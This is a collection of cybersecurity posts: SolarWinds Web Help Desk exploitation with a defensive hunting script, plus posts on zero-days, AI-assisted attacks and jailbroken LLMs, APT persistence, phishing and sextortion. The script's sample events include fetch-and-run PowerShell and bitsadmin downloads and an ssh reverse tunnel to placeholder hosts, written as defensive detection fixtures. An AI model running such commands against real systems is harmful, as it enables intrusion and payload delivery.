INTRUSION PATTERN: SUPPLY CHAIN SOFTWARE AS A SINGLE-POINT INITIAL ACCESS VECTOR VIA UNAUTHENTICATED RCE

ℹ️ Researchers have observed active, in-the-wild exploitation of SolarWinds Web Help Desk (WHD), a widely deployed IT service management solution, being used as the initial access vector in sophisticated intrusions.
ℹ️ This isn’t just theoretical risk. Attackers are exploiting WHD vulnerabilities to gain footholds in enterprise networks and escalate to domain compromise.

WHD is:
■ Third-party, vendor-supplied software.
■ Trusted by default once installed inside the enterprise.
■ Integrated into core IT operations (ticketing, asset management, credentials, workflows).
■ Often internet-facing and runs with elevated privileges.

📍 THREAT ACTOR BEHAVIOR

INITIAL ACCESS
■ Internet-exposed WHD servers with unpatched critical vulnerabilities (notably CVE-2025-40551, CVE-2025-40536, and older CVE-2025-26399) were successfully exploited to achieve unauthenticated remote code execution (RCE).
■ Researchers cannot yet definitively attribute which specific CVE was exploited in every observed case because multiple vulnerabilities were present concurrently on impacted hosts.

POST EXPLOITATION
Once a foothold was established, the intruder activity included:
■ Payload execution via PowerShell and BITS to download further tooling.
■ Installation of unauthorized RMM (Remote Monitoring & Management) software, such as ManageEngine artifacts (e.g., ToolsIQ.exe).
■ Lateral movement with reverse SSH shells and RDP.
■ Persistence and privilege escalation:
◽ DLL sideloading via legitimate Windows executables.
◽ Credential theft and abuse with techniques like DCSync, reflecting domain replication attacks to extract account credential hashes.

✷ This progression shows an adversary with operational security (OPSEC) discipline, relying on living-off-the-land techniques and legitimate services to reduce detection signals.
✷ This behavior demonstrates a well-known but highly damaging scenario where one exposed and vulnerable application enables attackers to progress from initial access to full domain control.

📍 RECOMMENDATIONS
■ Patch immediately: Update all SolarWinds WHD instances to version 2026.1 or later.
■ Remove public exposure: Block access to WHD admin interfaces from the internet.
■ Credential reset: Rotate credentials for service and privileged accounts reachable from WHD.
■ Incident hunting: Look for unauthorized RMM artifacts, lateral movement activity, and abnormal identity behaviors.
■ Network segmentation: Isolate compromised hosts and employ defense-in-depth controls (e.g., segmentation, identity protection).

📌 Source: Microsoft 🔗 https://lnkd.in/dNezpRPK
#solarwinds #whd #supplychain #supplychainattack #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection
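A hunting script for the post-exploitation indicators the post lists, added here as an example and not taken from the report or from Microsoft: it scans constructed Sysmon-style process-creation events and Security 4662 events supplied as JSON lines. The flat field names, the hosts, accounts and URLs, and the APPROVED_RMM allowlist are assumptions; the replication-rights GUID is the standard DS-Replication-Get-Changes-All identifier.

```python
"""Hunt for the post-exploitation behaviours listed above (PowerShell/BITS
downloads, unapproved RMM, reverse SSH, DCSync) in JSON-lines Windows events."""
import json
import re

REPL_ALL_GUID = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
RMM_INDICATORS = {"toolsiq.exe"}    # ManageEngine artifact named in the report
APPROVED_RMM = {"approvedrmm.exe"}  # hypothetical allowlist for this environment

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def process_findings(ev):
    """Technique labels matched by one Sysmon-style process-creation (EID 1) event."""
    img, cmd = basename(ev.get("Image", "")), ev.get("CommandLine", "")
    low, hits = cmd.lower(), []
    if img == "powershell.exe" and re.search(r"downloadstring|downloadfile|invoke-webrequest", low):
        hits.append("powershell download cradle")
    if (img == "bitsadmin.exe" and "/transfer" in low) or "start-bitstransfer" in low:
        hits.append("bits download")
    if img in RMM_INDICATORS and img not in APPROVED_RMM:
        hits.append("unapproved rmm binary")
    if img == "ssh.exe" and re.search(r"\s-R\s", cmd):  # -R sets up a remote forward
        hits.append("reverse ssh tunnel")
    return hits

def dcsync_findings(ev):
    """Flag Security 4662 replication reads by non-machine accounts (simplified check)."""
    if (ev.get("EventID") == 4662 and REPL_ALL_GUID in ev.get("Properties", "").lower()
            and not ev.get("SubjectUserName", "").endswith("$")):
        return ["dcsync-style replication request"]
    return []

def hunt(jsonl):
    """Return (host, labels) for every event in the JSON-lines text that matched a rule."""
    out = []
    for line in filter(None, jsonl.splitlines()):
        ev = json.loads(line)
        labels = process_findings(ev) if ev.get("EventID") == 1 else dcsync_findings(ev)
        if labels:
            out.append((ev["Computer"], labels))
    return out

# Constructed sample events; hosts, accounts and URLs are placeholders.
SAMPLE = r'''
{"EventID": 1, "Computer": "whd01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/t.exe','C:\\Users\\Public\\t.exe')"}
{"EventID": 1, "Computer": "whd01", "Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /transfer j /download /priority high http://example.invalid/u.exe C:\\Users\\Public\\u.exe"}
{"EventID": 1, "Computer": "whd01", "Image": "C:\\Users\\Public\\ToolsIQ.exe", "CommandLine": "ToolsIQ.exe"}
{"EventID": 1, "Computer": "whd01", "Image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:22 user@example.invalid"}
{"EventID": 1, "Computer": "ws07", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe report.txt"}
{"EventID": 4662, "Computer": "dc01", "SubjectUserName": "svc_whd", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "Computer": "dc01", "SubjectUserName": "DC02$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
'''
```

Running `hunt(SAMPLE)` flags the four whd01 events and the svc_whd replication request, while the notepad event and the DC02$ machine-account replication stay silent.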
How Cybercriminals Exploit Security Vulnerabilities
Summary
Cybercriminals exploit security vulnerabilities by finding weaknesses in software, networks, and even artificial intelligence systems to gain unauthorized access, steal data, or disrupt operations. Security vulnerabilities are flaws or gaps that make it easier for attackers to infiltrate digital systems and often go unnoticed until they are actively exploited.
- Patch promptly: Regularly update software and devices to close security holes before attackers can take advantage of them.
- Audit and secure assets: Continuously review your internet-facing systems, domains, and AI tools for misconfigurations or weak spots that could be entry points for threats.
- Monitor and adapt: Establish ongoing monitoring and adjust security protocols to address emerging threats, especially those involving AI-driven attacks or new vulnerabilities.
🚨 Five Eyes Trends on Exploits: Insights from the 2023 Top Routinely Exploited Vulnerabilities Earlier this week, the cybersecurity agencies of the Five Eyes nations—the U.S., U.K., Australia, Canada, and New Zealand—issued a stark warning that highlights a new reality: zero-day vulnerabilities are becoming the “new normal” in cyber exploits. This marks a significant departure from 2022 and 2021 when older, more established vulnerabilities were most frequently targeted. Today, adversaries are increasingly exploiting freshly disclosed zero-day vulnerabilities, often within hours of discovery. The advisory reveals that many of these targeted devices (think of VPNs, SSL gateways, and remote management consoles) are on the periphery of an organization’s network. Do you recognize a trend here? 👀 These edge devices are prime targets and typically lack robust logging or agent-based monitoring capabilities. It can be challenging for organizations to know when these types of devices have been pwned. Organizations frequently face a race condition with adversaries— from initial exploitation of the vulnerability, to community recognition, vendor patch release, and eventual patching by the organization. This trend underscores the importance of employing Zero Trust principles, where nothing is blindly trusted within the network. A properly architected Zero Trust and Secure Access Service Edge (SASE) approach can enable organizations to detect and block adversaries before they can cause significant compromise. The advisory explicitly encourages leveraging CISA’s Zero Trust Maturity Model (ZTMM) and the Department of Defense’s Zero Trust guidance, pushing organizations toward a resilient, secure-by-design architecture.
As the UK’s NCSC CTO Ollie Whitehouse observed, this “new normal… should concern end-user organizations and vendors alike as malicious actors seek to infiltrate networks.” To combat this, network segmentation and SASE solutions can play a critical role in halting lateral movement and keeping this “new normal” in check. 🛡️ With the right architecture, organizations can mitigate risks and stop threats before they gain a foothold. Full disclosure: I am a co-author of CISA's Zero Trust Maturity Model. The Five Eyes CSA is attached. The NCSC’s website with Mr. Whitehouse’s comments is cited in the comments. #technology #softwareengineering #programming #strategy #computersecurity #cloudcomputing #informationsecurity #zscaler #riskmanagement #cybersecurity #zerotrust
-
New findings from OpenAI reinforce that attackers are actively leveraging GenAI. Palo Alto Networks Unit 42 has observed this firsthand: we've seen threat actors exploiting LLMs for ransomware negotiations, deepfakes in recruitment scams, internal reconnaissance and highly tailored phishing campaigns. China and other nation-states in particular are accelerating their use of these tools, increasing the speed, scale, and efficacy of attacks. But, we’ve also seen this on the cybercriminal side. Our research uncovered vulnerabilities in LLMs, with one model failing to block 41% of malicious prompts. Unit 42 has jailbroken models with minimal effort, producing everything from malware and phishing lures to even instructions for creating a molotov cocktail. This underscores a critical risk: GenAI empowers attackers, and they are actively using it. Understanding how attackers will leverage AI to advance their attacks but also exploit AI implementations within organizations is crucial. AI adoption and innovation are occurring at breakneck speed and security can’t be ignored. Adapting your organization’s security strategy to address AI-powered attacks is essential.
-
The Unseen Threat: Is AI Making Our Cybersecurity Weaknesses Easier to Exploit?
AI in cybersecurity is a double-edged sword. On one hand, it strengthens defenses. On the other, it could unintentionally expose vulnerabilities. Let’s break it down.
The Good:
- Real-time Threat Detection: AI identifies anomalies faster than human analysts.
- Automated Response: Reduces time between detection and mitigation.
- Behavioral Analytics: AI monitors network traffic and user behavior to spot unusual activities.
The Bad:
But, AI isn't just a tool for defenders. Cybercriminals are exploiting it, too:
- Optimizing Attacks: Automated penetration testing makes it easier for attackers to find weaknesses.
- Automated Malware Creation: AI can generate new malware variants that evade traditional defenses.
- Impersonation & Phishing: AI mimics human communication, making scams more convincing.
Specific Vulnerabilities AI Creates:
👉 Adversarial Attacks: Attackers manipulate data to deceive AI models.
👉 Data Poisoning: Malicious data injected into training sets compromises AI's reliability.
👉 Inference Attacks: Generative AI tools can unintentionally leak sensitive info.
The Takeaway:
AI is revolutionizing cybersecurity but also creating new entry points for attackers. It's vital to stay ahead with:
👉 Governance: Control over AI training data.
👉 Monitoring: Regular checks for adversarial manipulation.
👉 Security Protocols: Advanced detection for AI-driven threats.
In this evolving landscape, vigilance is key. Are we doing enough to safeguard our systems?
-
Chinese Hackers Spent Four Years Inside Asian Telco’s Network, Exposing Critical Weaknesses in Internet Infrastructure. Oftentimes this is going on for years - decades. In a chilling example of long-term cyber infiltration, Chinese state-sponsored hackers allegedly compromised an Asian telecommunications company and remained undetected for four years, according to a report by cybersecurity firm Sygnia. The breach highlights the catastrophic consequences of failing to secure digital infrastructure—particularly domains, subdomains, and DNS servers. Sygnia’s investigation revealed the attackers used advanced persistent threat (APT) tactics, leveraging stealthy tools like the China Chopper web shell to maintain covert access. Insecure or misconfigured domains, subdomains, and DNS servers likely played a pivotal role in the intrusion. These overlooked assets often act as open doors for cybercriminals, allowing them to exploit outdated software, weak authentication mechanisms, or improperly secured file upload features. Once inside, the attackers quietly harvested sensitive data, escalated privileges, and moved laterally across networks—undetected for years. The lack of basic hygiene in DNS configurations and web application security significantly contributed to the telco’s prolonged exposure. This case underscores an urgent truth: unsecured Internet assets aren't just technical liabilities—they’re national security threats. As digital perimeters expand, threat actors are increasingly exploiting blind spots like dormant subdomains or misconfigured DNS records. Regular audits, vulnerability patching, and hardened DNS infrastructure are critical in closing these gaps. Failure to act ensures one thing: attackers will exploit the negligence—just as they did here, for four silent years. For the full article: https://lnkd.in/eYasi8ZP
-
Mandiant’s latest report finds that the time-to-exploit for newly disclosed vulnerabilities is now so short that exploitation often precedes patch availability. That tracks with what we observe across the broader cybercrime ecosystem: increasing sophistication driven by market incentives that reward specialization and create efficient, interoperable supply chains. Over the past five years, cybercrime has matured into a full-fledged market economy, accelerating most threat vectors—especially vulnerability exploitation. This “cybercrime supply chain” lets even less-skilled actors buy ready-made proof-of-concept exploits or simply purchase access from initial-access brokers who have already established a foothold.
-
The window between vulnerability disclosure and active exploitation is collapsing. Recent reports show threat actors weaponizing new vulnerabilities within 24 hours of disclosure. AI tools are compressing this timeline even further. Researcher Matt Keeley recently showed that AI models can analyze code differences between patched and vulnerable versions to produce functional exploits—sometimes before any public proof-of-concept is available. Tasks that once took days of manual review now get solved in hours. This trend regularly surfaces during offensive security engagements. Threat actors aggressively scan for the latest disclosed vulnerabilities, especially in Content Management Systems. Once initial access is gained, these systems are used for phishing infrastructure or lateral movement inside networks.
The takeaway:
➡️ Traditional patch cycles are fundamentally broken compared to today's threat actors
➡️ Attack surface management needs to be continuous, not periodic
➡️ Organizations must validate security patches within hours, not days
How quickly is your organization deploying critical patches—and how are you confirming that those patches are actually closing the gaps? #Cybersecurity #RedTeaming #ThreatIntelligence
-
⚠️ Inside Hacker’s Mind: 6 Cyber Attacks Explained
Cyberattacks aren’t random. They’re strategic, calculated and increasingly sophisticated. Here’s a glimpse into some of the techniques hackers use to exploit vulnerabilities:
1. Phishing → deceives users into providing sensitive information by posing as legitimate entities. Common channels include email and social media.
• Vector: Email, SMS, social engineering
• Defense: User education, two-factor authentication (2FA), email filtering.
2. Ransomware → encrypts files, rendering them inaccessible. Attackers demand a ransom for decryption, often in cryptocurrency.
• Vector: Phishing emails, exploit kits
• Defense: Regular backups, patch management, endpoint detection, network segmentation.
3. SQL Injection → manipulates queries to access unauthorized data.
• Vector: Web inputs (login forms, search bars)
• Defense: Use prepared statements, validate inputs, employ web application firewalls (WAF).
4. DNS Spoofing → also known as DNS cache poisoning, this redirects users from legitimate websites to malicious ones.
• Vector: Compromised DNS servers, vulnerable routers
• Defense: DNSSEC, secure DNS resolvers, cache validation.
5. DoS (Denial of Service) → attacks overload a server with excessive requests, disrupting service.
• Vector: Network connections, application layer
• Defense: Rate limiting, traffic filtering, load balancing, DDoS mitigation.
6. XSS (Cross-Site Scripting) → injects malicious scripts into websites, allowing attackers to impersonate users or steal data.
• Vector: Web forms, URL parameters
• Defense: Content Security Policy (CSP), input sanitization, output encoding.
If a cyberattack happened today, would you know what to do?
In upcoming posts, I’ll dive into practical steps you can take.
_______________
📷 Visualizing Software Engineering, AI and ML concepts through easy-to-understand Sketᵉch. I'm Nina, software engineer & project manager. Sketᵉch now has a LinkedIn Page. Join me! ❤️
#cybersecurity #it
-
Cybercriminals have an easy-to-use trick to bypass your security controls… It’s called living-off-trusted-sites (LOTS). And it’s LOTS of fun (I'm not sorry for this terrible joke). While it’s not a new technique by any means, it’s a new term I learned to explain this basic technique. It’s where attackers use popular and legitimate websites or applications to conduct part of their attacks. A basic example is an attacker using something like Dropbox to upload stolen files from a compromised system. But let’s look at a cool recent example that Menlo Security Inc. wrote up:
1. Phishing Email: The attacker sends the victim a phishing email impersonating Amazon. The email includes a link to a Google Drawings image, which is a graphic prompting the user to verify their account because the account was “suspended” due to “unusual sign-in activity.” The graphic links to an attacker-controlled phishing site.
2. Verification Link: The malicious link is shortened with the WhatsApp URL shortener to hide the true phishing site. When the user clicks on the image, thinking they are about to verify their Amazon account, they are sent to a phishing page resembling the Amazon sign-on page.
3. Account Verification: After sending their Amazon credentials, the victim is prompted through a series of pages to provide their mother’s maiden name, date of birth, phone number, address, and credit card information. That’s a lot of information that can do a lot of damage to the victim while giving the attacker a good payday. The victim is then redirected to the legitimate Amazon login page.
Using LOTS increases the likelihood that the site won’t be blocked by security software, increasing the chances that the user will click on a link in a phishing email and get through. At the same time, once the abuse is identified, those websites/SaaS applications won’t wait around to take down the malicious content. But by that time, the damage is already done.
-
The internet is rife with scams, and the latest involves hackers exploiting vulnerabilities in the Microsoft 365 Admin Portal to send fraudulent emails directly from legitimate Microsoft.com accounts. These emails bypass spam filters, giving them an appearance of credibility, but their true purpose is extortion. These scam emails claim to have sensitive images or videos of the recipient in compromising situations. To prevent this alleged content from being shared, the recipient is asked to pay a ransom—often in Bitcoin. This type of cybercrime, known as “sextortion,” is designed to prey on fear and desperation, making victims more likely to comply with the scammer’s demands. Unfortunately, sextortion scams are becoming increasingly common. While tech companies like Microsoft and Instagram implement protective measures, hackers find new ways to exploit technical vulnerabilities. In this case, scammers took advantage of a flaw in the Microsoft 365 Message Center’s “share” function, commonly used for legitimate service advisories. This loophole allows hackers to send emails that appear to come from a genuine Microsoft.com address, deceiving even cautious users. To identify such scams, it is crucial to evaluate the content of the email. Legitimate companies like Microsoft will never request payment in Bitcoin or other cryptocurrencies. https://lnkd.in/gts4Mg4F